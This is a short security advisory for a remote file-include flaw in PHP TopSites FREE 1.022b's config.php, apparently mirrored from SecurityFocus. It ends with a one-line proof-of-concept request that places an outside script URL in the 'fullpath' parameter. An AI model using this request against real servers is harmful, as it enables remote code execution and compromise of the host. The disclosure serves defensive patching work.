PHP TopSites FREE 1.022b Config.PHP Remote File Include Vulnerability

2014-07-01T00:00:00
ID SSV:82338
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/20486/info

PHP TopSites is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data.

An attacker can exploit this issue to have malicious PHP code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Version 1.022 is affected by this issue; other versions may also be affected.

http://www.example.com/[path]/config.php?fullpath=|SCRIPT-URL|